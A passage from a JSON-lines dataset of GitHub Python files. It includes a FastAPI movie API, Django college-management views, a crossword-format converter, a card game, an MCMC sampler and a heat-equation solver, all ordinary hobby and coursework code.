df.loc[df.title == pelicula]\n du = d['runtime'].to_list()[0]\n y = d['year'].to_list()[0]\n \n return{'Pelicula:':pelicula, 'duracion:':du, 'anio:':y}\n\n@app.get('/franquicia/{franquicia}')\ndef franquicia(franquicia:str):\n ##Se ingresa la franquicia y la funcion retorna la franquicia, cantidad de peliculas, ganancia total y ganancia promedio\n df = pd.read_csv('franq.csv')\n d = df.loc[df.belongs_to_collection == franquicia]\n c = d['count'].to_list()[0]\n m = d['mean'].to_list()[0]\n s = d['sum'].to_list()[0]\n return {'Franquicia':franquicia, 'cantidad':c, 'ganancia_total':s, 'ganancia_promedio':m}\n\n\n@app.get('/pelicula_pais/{pais}')\ndef pelicula_pais(pais:str):\n ##Ingresas el pais, retornando la cantidad de peliculas producidas en el mismo\n df = pd.read_csv('paispeli.csv')\n d = df.loc[df.country == pais]\n d = d['num_movies'].to_list()[0]\n return {'Pais':pais, 'cantidad':d}\n\n\n@app.get('/productoras_exitosas/{productora}')\ndef productoras_exitosas(productora:str):\n ##Ingresa la productora, retornando la ganancia total y la cantidad de peliculas que produjeron\n df = pd.read_csv('prod.csv')\n d = df.loc[df.companies == productora]\n c = d['Number'].to_list()[0]\n m = d['Average'].to_list()[0]\n s = d['Total'].to_list()[0]\n\n return {'Productora':productora, 'Ganancia_total':s, 'Cantidad':c, 'Promedio':m}\n\n\n@app.get('/get_director/{nombre_director}')\ndef get_director(nombre_director:str):\n ##Se ingresa el nombre de un director que se encuentre dentro de un dataset debiendo devolver el exito del mismo medio a traves del retorno.\n ##Ademas, debera devolver el nombre de cada pelicula con la fecha de lanzamiento, retorno individual, costo y ganancia de la misma.\n df = pd.read_csv('dir.csv')\n df1 = pd.read_csv('dir_pel.csv')\n d = df.loc[df.director == nombre_director]\n r = d['return'].to_list()\n\n b = df1[(df1['director'] == nombre_director) & (df1['return'].notnull())]\n g = b['title'].to_list()\n a = b['year'].to_list()\n rr = b['return'].to_list()\n bd = b['budget'].to_list()\n rv = b['revenue'].to_list()\n return {'director':nombre_director, 'retorno_total_director':r,\n 'peliculas':g, 'anio':a, 'retorno_pelicula':rr,\n 'budget_pelicula':bd, 'revenue_pelicula':rv}\n\n\n@app.get('/recomendacion/{titulo}')\n#ML\ndef recomendacion(titulo):\n ##Ingresas un nombre de pelicula y te recomienda las similares en una lista\n i = pd.read_csv('titulo.csv')\n tfidf = TfidfVectorizer(stop_words=\"english\")\n i[\"overview\"] = i[\"overview\"].fillna(\"\")\n\n tfidf_matriz = tfidf.fit_transform(i[\"overview\"])\n coseno_sim = linear_kernel(tfidf_matriz, tfidf_matriz)\n\n indices = pd.Series(i.index, index=i[\"title\"]).drop_duplicates()\n idx = indices[titulo]\n simil = list(enumerate(coseno_sim[idx]))\n simil = sorted(simil, key=lambda x: x[1], reverse=True)\n simil = simil[1:11]\n movie_index = [i[0] for i in simil]\n\n lista = i[\"title\"].iloc[movie_index].to_list()[:5]\n\n return {'lista recomedada': lista}\n","repo_name":"luisEmmanuel/PI_MLOps","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37254077066","text":"from django.views import View\nfrom onlineapp.models import *\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.urls import resolve\nfrom django.http import HttpResponse\nfrom onlineapp.forms.FormModule import *\nfrom django.contrib.auth import *\nfrom django.contrib.auth.mixins import *\n\n\n\nclass DisplayCollegeView(LoginRequiredMixin, View):\n login_url = '/onlineapp/login/'\n def get(self, request, *args, **kwargs):\n c = college.objects.values(\"name\", \"acronym\").distinct()\n DICT_QUERY_SET = dict()\n DICT_QUERY_SET['result_set'] = c\n DICT_QUERY_SET['permissions']= request.user.get_all_permissions()\n return render(request, 'onlineapp_queries_link.html', DICT_QUERY_SET)\n\n\n\nclass CollegeView(LoginRequiredMixin, View):\n login_url = '/onlineapp/login/'\n def get(self, request, *args, **kwargs):\n if kwargs:\n resultset = student.objects.filter(college=kwargs.get('acronym')).values(\"db_folder\", \"college\",\"mocktest1__total\")\n DICT_QUERY_SET = dict()\n DICT_QUERY_SET['result_set'] = resultset\n DICT_QUERY_SET['college_name'] = kwargs.get('acronym')\n DICT_QUERY_SET['title_student'] = \"Students from {} college\".format(kwargs.get('acronym'))\n DICT_QUERY_SET['permissions'] = request.user.get_all_permissions()\n return render(\n request,\n template_name=\"onlineapp_queries_students.html\",\n context=DICT_QUERY_SET\n )\n\n\nclass AddCollegeView(LoginRequiredMixin, View):\n login_url = '/onlineapp/login/'\n def get(self, request, *args, **kwargs):\n form = AddCollege()\n if resolve(request.path_info).url_name == 'delete_college':\n college.objects.get(acronym=kwargs.get('acronym')).delete()\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/\")\n if kwargs:\n c = college.objects.filter(**kwargs).first()\n form = AddCollege(instance=c)\n return render(\n request,\n template_name=\"Create_college.html\",\n context=\n {\n 'form': form\n }\n )\n\n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n if resolve(request.path_info).url_name == 'edit_college':\n c = college.objects.get(acronym=kwargs.get('acronym'))\n form = AddCollege(request.POST, instance=c)\n if form.is_valid():\n topic = form.save(commit=False)\n topic.save()\n return render(\n request,\n template_name=\"Create_college.html\",\n context=\n {\n 'form': form,\n 'title': \"Edited Successfully\"\n }\n )\n form = AddCollege(request.POST)\n if form.is_valid():\n topic = form.save(commit=False)\n topic.save()\n return render(\n request,\n template_name=\"Create_college.html\",\n context=\n {\n 'form': form,\n 'title': \"Inserted Successfully\"\n }\n )\n else:\n form = AddCollege()\n return render(\n request,\n template_name=\"Create_college.html\",\n context=\n {\n 'form': form,\n 'title': \"College Insertion\"\n }\n )\n\n\nclass AddStudentView(LoginRequiredMixin, View):\n login_url = '/onlineapp/login/'\n\n def get(self, request, *args, **kwargs):\n form_marks = AddMarks()\n form_student = AddStudent()\n if resolve(request.path_info).url_name == 'delete_student_marks':\n student.objects.get(db_folder=kwargs.get('db_folder')).delete()\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/college/\" + kwargs.get('acronym') + \"/\")\n if kwargs and kwargs.get('db_folder'):\n s = student.objects.get(db_folder=kwargs.get('db_folder'))\n form_student = AddStudent(instance=s)\n m = MockTest1.objects.get(student=kwargs.get('db_folder'))\n if m is not None:\n form_marks = AddMarks(instance=m)\n return render(\n request,\n template_name=\"Create_student_marks.html\",\n context=\n {\n 'form_student': form_student,\n 'form_marks': form_marks,\n }\n )\n\n def post(self, request, *args, **kwargs):\n form_student = AddStudent()\n form_marks = AddMarks()\n if request.method == 'POST':\n if resolve(request.path_info).url_name == 'edit_student_marks':\n s = student.objects.get(db_folder=kwargs.get('db_folder'))\n m = MockTest1.objects.get(student=s)\n s.name = str(request.POST.get('name'))\n s.email = str(request.POST.get('email'))\n s.college_id = kwargs.get('acronym')\n s.save()\n m.total = int(request.POST.get('problem1')) + int(request.POST.get('problem2')) + int(\n request.POST.get('problem3')) + int(request.POST.get('problem4'))\n m.problem1 = request.POST.get('problem1')\n m.problem2 = request.POST.get('problem2')\n m.problem3 = request.POST.get('problem3')\n m.problem4 = request.POST.get('problem4')\n m.save()\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/college/\" + kwargs.get('acronym') + \"/\")\n else:\n form_student = AddStudent()\n form_marks = AddMarks()\n return render(\n request,\n template_name=\"Create_student_marks.html\",\n context=\n {\n 'form_student': form_student,\n 'form_marks': form_marks\n }\n )\n\n\n\nclass LoginController(View):\n def get(self, request, *args, **kwargs):\n login = Login()\n return render(\n request,\n template_name=\"login.html\",\n context=\n {\n 'login': login\n }\n )\n\n def post(self, request, *args, **kwargs):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/\")\n else:\n return redirect(\"http://127.0.0.1:8000/onlineapp/login/\")\n\n\nclass SignUpController(View):\n def get(self, request, *args, **kwargs):\n signup = Signup()\n return render(\n request,\n template_name=\"signup.html\",\n context=\n {\n 'signup': signup\n }\n )\n\n def post(self, request, *args, **kwargs):\n form = Signup(request.POST)\n if form.is_valid():\n user = User.objects.create_user(**form.cleaned_data)\n if user is not None:\n login(request, user)\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/\")\n else:\n return redirect(\"http://127.0.0.1:8000/onlineapp/login/\")\n\n\ndef logout_user(request):\n logout(request)\n return redirect(\"http://127.0.0.1:8000/onlineapp/login/\")\n","repo_name":"ramyasree0299/summer2019_GNITS_ramyasree","sub_path":"Apps Course/classproject/onlineapp/views/onlineappviews.py","file_name":"onlineappviews.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3965230057","text":"#!/usr/bin/env python3\n\nimport sys\nimport string\nimport urllib.parse\n\n# pip install crossword puzpy\n\nimport puz\nimport crossword\n\n\nREBUS_SEP = \" \"\nUNKNOWN_CHAR = '.'\nBLOCK_CHAR = '#'\nOPEN_CHAR = '_'\nEOL = '\\n'\nSECTION_SEP = EOL + EOL\nHEADER_ORDER = ['title', 'author', 'editor', 'copyright', 'number', 'date',\n 'relation', 'special', 'rebus', 'cluegroup', 'description', 'notes']\n\nNON_ANSWER_CHARS = [BLOCK_CHAR, OPEN_CHAR] # UNKNOWN_CHAR is a wildcard answer character\n\n\ndef decode(s):\n s = s.replace('\\x92', \"'\")\n s = s.replace('\\xc2\\x92', \"'\")\n s = s.replace('\\xc3\\x82',\"\")\n s = s.replace('\\xc3\\xa8',\"è\") # +A5. Crème de la crème ~ ELITE\n s = s.replace('\\xe0','à') # -A49. Do the seemingly impossible, à la Jesus ~ WALKONWATER\n s = s.replace('\\xc2', \" \") # Change rest of 0xC2 to 0x20\n s = s.replace('\\xa0',\" \")\n s = s.replace('\\x93', '\"')\n s = s.replace('\\x94', '\"')\n s = s.replace('\\x97', \"—\")\n s = s.replace('\\x85', '...')\n s = s.replace('\\x86', '†')\n s = s.replace('\\xd3','\"')\n s = s.replace('\\xd4','\"')\n s = urllib.parse.unquote(s)\n return s\n\n\nclass xdfile:\n def __init__(self):\n self.headers = {} # [key] -> value or list of values\n self.grid = [] # list of string rows\n self.clues = [] # list of ((\"A\", 21), \"{*Bold*}, {/italic/}, {_underscore_}, or {-overstrike-}\", \"MARKUP\")\n self.notes = \"\"\n\n def cell(self, r, c):\n if r < 0 or c < 0 or r >= len(self.grid) or c >= len(self.grid[0]):\n return BLOCK_CHAR\n return self.grid[r][c]\n\n def rebus(self):\n \"\"\"returns rebus dict of only special (non A-Z) characters\"\"\"\n rebusstr = self.get_header(\"Rebus\")\n r = {}\n if rebusstr:\n for p in rebusstr.split(REBUS_SEP):\n cellchar, _, replstr = p.partition(\"=\")\n assert len(cellchar) == 1, (rebusstr, cellchar)\n replstr = replstr.strip()\n r[cellchar] = replstr\n\n return r\n\n # generates: \"A\" or \"D\", clue_num, answer, r, c\n def iteranswers_full(self):\n # construct rebus dict with all grid possibilities so that answers are complete\n rebus = {}\n for c in string.ascii_letters:\n assert c not in rebus, c\n rebus[c] = c.upper()\n rebus.update(self.rebus())\n\n # traverse grid and yield (dir, pos, answer)\n clue_num = 1\n\n for r, row in enumerate(self.grid):\n for c, cell in enumerate(row):\n # compute number shown in box\n new_clue = False\n if self.cell(r, c - 1) in NON_ANSWER_CHARS: # across clue start\n ncells = 0\n answer = \"\"\n while self.cell(r, c + ncells) not in NON_ANSWER_CHARS:\n cellval = self.cell(r, c + ncells)\n answer += rebus.get(cellval, cellval)\n ncells += 1\n\n if ncells > 1:\n new_clue = True\n yield \"A\", clue_num, answer, r, c\n\n if self.cell(r - 1, c) in NON_ANSWER_CHARS: # down clue start\n ncells = 0\n answer = \"\"\n while self.cell(r + ncells, c) not in NON_ANSWER_CHARS:\n cellval = self.cell(r + ncells, c)\n answer += rebus.get(cellval, cellval)\n ncells += 1\n\n if ncells > 1:\n new_clue = True\n yield \"D\", clue_num, answer, r, c\n\n if new_clue:\n clue_num += 1\n\n def width(self):\n return self.grid and len(self.grid[0]) or 0\n\n def height(self):\n return len(self.grid)\n\n # returns (w, h)\n def size(self):\n return (self.width(), self.height())\n\n def iteranswers(self):\n for direction, clue_num, answer, r, c in self.iteranswers_full():\n yield direction, clue_num, answer\n\n def set_header(self, fieldname, newvalue=None):\n# if fieldname in self.headers:\n# if newvalue != self.headers.get(fieldname, None):\n# log(\"%s[%s] '%s' -> '%s'\" % (self.filename, fieldname, self.headers[fieldname], newvalue))\n\n if newvalue:\n newvalue = str(newvalue).strip()\n newvalue = \" \".join(newvalue.splitlines())\n newvalue = newvalue.replace(\"\\t\", \" \")\n\n self.headers[fieldname] = newvalue\n else:\n if fieldname in self.headers:\n del self.headers[fieldname]\n\n def get_header(self, fieldname):\n v = self.headers.get(fieldname)\n assert v is None or isinstance(v, str), v\n return (v or \"\").strip()\n\n def iterheaders(self):\n def header_sort_key(item):\n if item[0].lower() not in HEADER_ORDER:\n return 1000\n\n return HEADER_ORDER.index(item[0].lower())\n\n for k, v in sorted(list(self.headers.items()), key=header_sort_key):\n yield k, v\n\n def to_unicode(self, emit_clues=True):\n # headers (section 1)\n\n r = \"\"\n\n if self.headers:\n for k, v in self.iterheaders():\n assert isinstance(v, str), v\n\n r += \"%s: %s\" % (k, v)\n r += EOL\n else:\n r += \"Title: %s\" % parse_pathname(self.filename).base\n r += EOL\n\n r += SECTION_SEP\n\n # grid (section 2)\n r += EOL.join(self.grid)\n r += EOL + EOL + EOL\n\n # clues (section 3)\n if emit_clues:\n prevdir = None\n for pos, clue, answer in self.clues:\n if not answer:\n r += EOL\n continue\n\n cluedir, cluenum = pos\n if prevdir and prevdir != cluedir: # Blank line between cluedirs\n r += EOL\n prevdir = cluedir\n\n r += \"%s%s. %s ~ %s\" % (cluedir, cluenum, (clue or \"[XXX]\").strip(), answer)\n r += EOL\n\n if self.notes:\n r += EOL + EOL\n r += self.notes\n\n r += EOL\n\n # some Postscript CE encodings can be caught here\n r = r.replace('\\x91', \"'\")\n r = r.replace('\\x92', \"'\")\n r = r.replace('\\x93', '\"')\n r = r.replace('\\x94', '\"')\n r = r.replace('\\x96', '___')\n r = r.replace('\\x85', '...')\n\n # these are always supposed to be double-quotes\n r = r.replace(\"''\", '\"')\n\n return r\n\n\ndef parse_puz(contents, filename):\n rebus_shorthands = list(\"zyxwvutsrqponmlkjihgfedcba⚷⚳♇♆⛢♄♃♂♁♀☿♹♸♷♶♵♴♳⅘⅗⅖⅕♚♛♜♝♞♟⚅⚄⚃⚂⚁⚀♣♦♥♠+&%$@?*0987654321\")\n\n try:\n puzobj = puz.load(contents)\n puzzle = crossword.from_puz(puzobj)\n except puz.PuzzleFormatError as e:\n emsg = e.message\n if \"\" in contents.decode('utf-8').lower():\n emsg += \" (looks like html)\"\n raise Exception(emsg)\n\n grid_dict = dict(list(zip(string.ascii_uppercase, string.ascii_uppercase)))\n\n xd = xdfile()\n\n xd.set_header(\"Author\", puzobj.author)\n xd.set_header(\"Copyright\", puzobj.copyright)\n xd.set_header(\"Notes\", puzobj.notes)\n xd.set_header(\"Postscript\", \"\".join(x for x in puzobj.postscript if ord(x) >= ord(' ')))\n xd.set_header(\"Preamble\", puzobj.preamble)\n\n xd.set_header(\"Title\", puzobj.title)\n\n used_rebuses = {} # [puz_rebus_gridvalue_as_string] -> our_rebus_gridvalue\n rebus = {} # [our_rebus_gridvalue] -> full_cell\n r = puzobj.rebus()\n if r.has_rebus():\n grbs = puzobj.extensions[b\"GRBS\"]\n if sum(x for x in grbs if x != 0) > 0: # check for an actual rebus\n for pair in puzobj.extensions[b\"RTBL\"].decode(\"cp1252\").split(\";\"):\n pair = pair.strip()\n if not pair:\n continue\n key, value = pair.split(\":\")\n rebuskey = rebus_shorthands.pop()\n used_rebuses[key] = rebuskey\n rebus[rebuskey] = decode(value)\n\n rebustr = REBUS_SEP.join([(\"%s=%s\" % (k, v)) for k, v in sorted(rebus.items())])\n xd.set_header(\"Rebus\", rebustr)\n\n # check for circles and record them if they exist\n circles = []\n if b\"GEXT\" in puzobj.extensions: \n for i, c in enumerate(puzobj.extensions[b\"GEXT\"]):\n if c == 0x80: circles.append(i)\n if circles: xd.set_header(\"Special\", \"circle\")\n\n for r, row in enumerate(puzzle):\n rowstr = \"\"\n for c, cell in enumerate(row):\n if puzzle.block is None and cell.solution == '.':\n rowstr += BLOCK_CHAR\n elif cell.solution == puzzle.block:\n rowstr += BLOCK_CHAR\n elif cell.solution == ':':\n rowstr += OPEN_CHAR\n elif cell == puzzle.empty:\n rowstr += UNKNOWN_CHAR\n else:\n n = r * puzobj.width + c\n reb = puzobj.rebus()\n if reb.has_rebus() and n in reb.get_rebus_squares():\n ch = str(reb.table[n] - 1)\n rowstr += used_rebuses[ch]\n cell.solution = rebus[used_rebuses[ch]]\n else:\n ch = cell.solution\n if ch not in grid_dict:\n if ch in rebus_shorthands:\n cellch = ch\n rebus_shorthands.remove(ch)\n warn(\"%s: unknown grid character '%s', assuming rebus of itself\" % (filename, ch))\n else:\n cellch = rebus_shorthands.pop()\n warn(\"%s: unknown grid character '%s', assuming rebus (as '%s')\" % (filename, ch, cellch))\n\n xd.set_header(\"Rebus\", xd.get_header(\"Rebus\") + \" %s=%s\" % (cellch, ch))\n\n grid_dict[ch] = cellch\n rowstr += grid_dict[ch].lower() if n in circles else grid_dict[ch]\n # ^ assumes a cell is never rebus and circle.\n\n xd.grid.append(rowstr)\n\n assert xd.size() == (puzzle.width, puzzle.height), \"non-matching grid sizes\"\n\n # clues\n answers = {}\n\n for posdir, posnum, answer in xd.iteranswers():\n answers[posdir[0] + str(posnum)] = answer\n\n try:\n for number, clue in puzzle.clues.across():\n cluenum = \"A\" + str(number)\n if cluenum not in answers:\n raise Exception(\"Clue number doesn't match grid: %s\" % cluenum)\n xd.clues.append(((\"A\", number), decode(clue), answers.get(cluenum, \"\")))\n\n for number, clue in puzzle.clues.down():\n cluenum = \"D\" + str(number)\n if cluenum not in answers:\n raise Exception(\"Clue doesn't match grid: %s\" % cluenum)\n xd.clues.append(((\"D\", number), decode(clue), answers.get(cluenum, \"\")))\n except KeyError as e:\n raise Exception(\"Clue doesn't match grid: %s\" % e)\n\n return xd\n\n\ndef main(fn):\n xd = parse_puz(open(fn, mode='rb').read(), fn)\n print(xd.to_unicode())\n\n\nfor fn in sys.argv[1:]:\n main(fn)\n","repo_name":"century-arcade/xd","sub_path":"puz2xd-standalone.py","file_name":"puz2xd-standalone.py","file_ext":"py","file_size_in_byte":11263,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"31"} +{"seq_id":"8487171171","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport threading\nimport time\n\n\nclass SendMonitorThread(threading.Thread):\n \"\"\" パケット送信モニタースレッド \"\"\"\n\n def __init__(self, sendObj, params):\n super(SendMonitorThread, self).__init__()\n self.sendObj = sendObj\n self.pps = params.pps\n self.stop_flg = False\n self.prev = 0\n self.current = 0\n\n def run(self):\n while True:\n self._update()\n if self.stop_flg:\n break\n # 1秒タイマー\n # ここはtime.perf_counter()つかうと送信精度落ちる\n time.sleep(1)\n self._clear()\n\n def stop(self):\n self.stop_flg = True\n\n def _clear(self):\n self.pps.set(0)\n self.sendObj.count = 0\n\n def _update(self):\n # 頻繁にカウンタリセットすると送信性能落ちるため\n # 差分を拾っていく\n self.current = self.sendObj.count\n self.pps.set(self.current - self.prev)\n self.prev = self.current\n\n # オーバーフロー対策\n # int最大値の半分以上でリセット\n if self.current > sys.maxsize / 2:\n self._reset()\n\n def _reset(self):\n self.current = 0\n self.prev = 0\n self.sendObj.count = 0\n","repo_name":"kinformation/hachi","sub_path":"model/SendMonitorThread.py","file_name":"SendMonitorThread.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"19579679462","text":"import inspect\nfrom types import FunctionType\nfrom typing import Union, get_type_hints\n\n\ndef _merge(functions: list, iter):\n \"\"\"Get a set of attributes describing several functions.\n\n Args:\n functions (list): list of functions (FunctionType)\n\n Raises:\n TypeError: If two functions have the same parameter name with different types or defaults.\n \"\"\"\n output = {}\n for f in functions:\n assert isinstance(f, FunctionType)\n i = iter(f)\n for k, v in i.items():\n if k in output:\n try:\n assert v == output[k]\n except AssertionError as e:\n raise TypeError(\n f\"Incompatible functions {functions}: {k} represented as both {v} and {output[k]}\"\n ) from e\n else:\n output[k] = v\n return output\n\n\ndef _merge_signatures(functions: list):\n \"\"\"Create a combined list of function parameters.\"\"\"\n return _merge(functions, lambda f: inspect.signature(f).parameters)\n\n\ndef _merge_type_hints(functions: list):\n \"\"\"Create a combined list of function parameter type hints.\"\"\"\n return _merge(functions, lambda f: get_type_hints(f))\n\n\ndef _get_defaults(signature):\n \"\"\"Create a dict of function parameters with defaults.\"\"\"\n return {\n k: v.default\n for k, v in signature.items()\n if v.default is not inspect.Parameter.empty\n }\n\n\ndef validate(functions: list, params: dict) -> dict:\n \"\"\"Validate and build kwargs for a set of functions based on their signatures.\n\n Args:\n functions (list): functions\n params (dict): kwargs provided in the event's message\n\n Returns:\n dict: validated kwargs required by the provided set of functions\n \"\"\"\n signature = _merge_signatures(functions)\n defaults = _get_defaults(signature)\n hints = _merge_type_hints(functions)\n\n validated = {}\n for k, v in signature.items():\n if k in params:\n p = params[k]\n if k in hints:\n t = hints[k]\n try:\n if hasattr(t, \"__origin__\") and t.__origin__ is Union:\n # https://stackoverflow.com/a/49471187\n assert any([isinstance(p, typ) for typ in t.__args__])\n else:\n assert isinstance(p, t)\n except AssertionError as e:\n raise TypeError(f\"Type of {k} should be {t} not {type(p)}.\") from e\n validated[k] = p\n else:\n validated[k] = p\n elif k not in (\"kwargs\", \"args\"):\n try:\n assert k in defaults\n except AssertionError as e:\n raise TypeError(f\"{functions} missing required argument: '{k}'\") from e\n\n return validated\n","repo_name":"mintel/lpipe","sub_path":"lpipe/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"6923866911","text":"from Chapter8.MilestoneProject.DeckOfCards import DeckOfCards\nfrom Chapter8.MilestoneProject.Player import Player\n\nmy_dec = DeckOfCards()\nplayer_one = Player('essa')\nplayer_two = Player('nada')\n\n\ndef deal_cards():\n my_dec.create_deck_of_cards()\n for _ in range(int(len(my_dec) / 2)):\n player_one.add_cards(my_dec.pick_card())\n player_two.add_cards(my_dec.pick_card())\n\n\ndef start_war(player_one_table, player_two_table):\n winner = ''\n war_is_on = True\n while war_is_on:\n if len(player_one.deck_of_cards) == 0:\n winner = player_two\n return winner, player_one_table + player_two_table\n elif len(player_two.deck_of_cards) == 0:\n winner = player_one\n return winner, player_one_table + player_two_table\n\n player_one_table.append(player_one.remove_cards())\n player_two_table.append(player_two.remove_cards())\n\n print(f'Player 1 Picked {str(player_one_table[-1])}')\n print(f'Player 2 Picked {str(player_two_table[-1])}')\n\n if player_one_table[-1].value > player_two_table[-1].value:\n winner = player_one\n war_is_on = False\n elif player_one_table[-1].value < player_two_table[-1].value:\n winner = player_two\n war_is_on = False\n print('------- War ended -------')\n return winner, player_one_table + player_two_table\n\n\ndef evaluate():\n player_one_table = [player_one.remove_cards()]\n player_two_table = [player_two.remove_cards()]\n\n print(f'Player 1 Hand {str(player_one_table[0])}')\n print(f'Player 2 Hand {str(player_two_table[0])}')\n\n if player_one_table[0].value == player_two_table[0].value:\n print('------- War Started -------')\n winner, cards = start_war(player_one_table, player_two_table)\n elif player_one_table[0].value > player_two_table[0].value:\n winner = player_one\n cards = player_one_table + player_two_table\n else:\n winner = player_two\n cards = player_one_table + player_two_table\n\n if winner == player_one:\n player_one.add_cards(cards)\n print(f'Player 1 Won the following cards {[str(x) for x in cards]}')\n\n else:\n player_two.add_cards(cards)\n print(f'Player 2 Won the following cards {[str(x) for x in cards]}')\n\n\ndef game_start():\n print('Dealing Cards')\n deal_cards()\n print('Starting Game')\n game_on = True\n\n while game_on:\n evaluate()\n if len(player_one.deck_of_cards) == 0:\n print('Player Two Won!!!')\n game_on = False\n elif len(player_two.deck_of_cards) == 0:\n print('Player One Won!!!')\n game_on = False\n\n if not game_on:\n user_choice = ''\n while user_choice != 'y' and user_choice != 'n':\n user_choice = input(\"Do you want to play again ? y/n\")\n\n if user_choice == 'y':\n player_one.wipe_cards()\n player_two.wipe_cards()\n deal_cards()\n game_on = True\n else:\n break\n\n\ngame_start()\n","repo_name":"EssaMaathMohammed/TestingPython","sub_path":"Chapter8/MilestoneProject/war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36869372098","text":"\"\"\"\n090915 S.Rodney\nCrude Metropolis-Hastings\n\"\"\"\n\ndef mcsample( p, x, Ndraws, x0=None, sigma=None, Nburnin=100, \n debug=False) :\n \"\"\" p and x are arrays holding values that sample a\n probability distribution: p(x). \n We construct a Markov Chain with Ndraws steps using the \n Metropolis-Hastings algorithm with a gaussian proposal distribution \n of stddev sigma. Default is sigma = (xmax-xmin)/10. \n \"\"\"\n from numpy import random\n from scipy import interpolate\n if debug: import pdb; pdb.set_trace()\n \n xmax = x[-1]\n xmin = x[0]\n if not sigma : sigma = (xmax-xmin)/10\n\n # define a linear interpolation probability function \n plint = interpolate.interp1d( x, p, copy=False, \n bounds_error=False, fill_value=0 )\n # if user doesn't provide a starting point, \n # then draw an initial random position\n if not x0 : x0 = random.uniform( xmin, xmax )\n p0 = plint( x0 ) \n xsamples = []\n # for i in xrange(Ndraws) : \n istep = 0\n while len(xsamples) < Ndraws :\n # draw a new position from a Gaussian proposal dist'n\n x1 = random.normal( x0, sigma ) \n p1 = plint( x1 )\n # compare new against old position\n if p1>=p0 : \n # new position has higher probability, so\n # accept it unconditionally\n if istep>Nburnin : xsamples.append( x1 ) \n p0=p1\n x0=x1\n else : \n # new position has lower probability, so \n # pick new or old based on relative probs.\n y = random.uniform( )\n if yNburnin : xsamples.append( x1 )\n p0=p1\n x0=x1\n else : \n if istep>Nburnin : xsamples.append( x0 )\n istep +=1\n return( xsamples )\n\n\ndef sntest(sn, N=1000, Nbin=100, sigma=None, debug=False):\n from numpy import arange\n pz = sn.PDF.data1 * sn.PDF.XSTEP \n pz = pz / pz.sum()\n zpk = sn.PDF.zpk\n nz = sn.PDF.NAXIS2\n dz = sn.PDF.XSTEP\n z0 = sn.PDF.XSTART\n z1 = sn.PDF.XSTART+nz*dz\n z = arange( z0, z1, dz )[:nz]\n \n if len(z) != len(pz): import pdb; pdb.set_trace()\n\n zsamples = mcsample( pz, z, N, sigma=sigma, debug=debug )\n\n from pylab import clf,plot,bar\n from numpy import histogram\n \n binct, binedge = histogram(zsamples, Nbin, new=True, normed=False )\n binsize = binedge[1]-binedge[0]\n binct = binct.astype(float) /binct.sum()/binsize\n clf()\n bar(binedge[:-1], binct, binsize,color='slateblue' )\n plot( z, pz/pz.sum()/dz, ls='-', color='maroon', marker=' ',\n lw=3)\n #return( binct, binedge, z, pz )\n","repo_name":"srodney/srpytools","sub_path":"metro.py","file_name":"metro.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"69804533210","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nDENSITY = 2.7889*1e3 # Kg/m^3\nTHERMAL_COND = 0.2473*1e3 # W/m-K\nSPECIFIC_HEAT = 0.7639*1e3 # J/Kg-K\nLENGTH = 0.12 # m\nTIME = 2000 # secs\n\nN1 = 1000\nN2 = 2000\nN3 = 3000\nN4 = 5000\nN5 = 10000\nN6 = 20000\n\nh = 3000 # W/m-K\nNUM_PTS_X = 100\nDELTA_X = LENGTH/NUM_PTS_X\nLAMBDA = THERMAL_COND/(DENSITY*SPECIFIC_HEAT)\nDELTA_T = DELTA_X ** 2 / (2* LAMBDA)\nSIGMA = (LAMBDA * DELTA_T) / DELTA_X ** 2\nNUM_PTS_T = int(TIME/ DELTA_T)\n# print(NUM_PTS_T)\nBETA = (DELTA_X*h)/THERMAL_COND\n\nT_amb = 298 # K\n\nassert (N1 + N2 + N3 + N4 + N5 + N6) <= NUM_PTS_T, \"Change NUM_PTS_T\"\n\ndef initialTemp (x = 0):\n\n f= 673\n return f\n\ndef heatSource (x = 0 , t = 0):\n\n q = 0\n\n return q\n\ndef initialCondition(spaceLocation):\n\n up = np.full(len(spaceLocation), initialTemp())\n\n return up\n\n\ndef meshing():\n\n spaceMeshLocation = np.zeros(NUM_PTS_X+1)\n timeMeshLocations = np.zeros(NUM_PTS_T+1)\n\n for i in range(0,NUM_PTS_X+1):\n spaceMeshLocation[i] = i*DELTA_X\n\n for i in range(0,NUM_PTS_T+1):\n timeMeshLocations[i] = i*DELTA_T\n\n return spaceMeshLocation, timeMeshLocations\n\n\ndef plottemp(u,spaceLocation, time):\n\n plt.plot(spaceLocation,u[0,:], 'r')\n plt.plot(spaceLocation,u[1,:], 'g')\n plt.plot(spaceLocation, u[2, :], 'b')\n plt.plot(spaceLocation, u[3, :], '--r')\n plt.plot(spaceLocation, u[4, :], '--g')\n plt.plot(spaceLocation, u[5, :], '--b')\n\n plt.xlabel('Length (m)')\n plt.ylabel('Tempreature (K)')\n plt.title('Length ($x$) vs. Tempreature ($u$)')\n label0 = 't ={0:0.2f} secs'.format(time[0])\n label1 = 't ={0:0.2f} secs'.format(time[1])\n 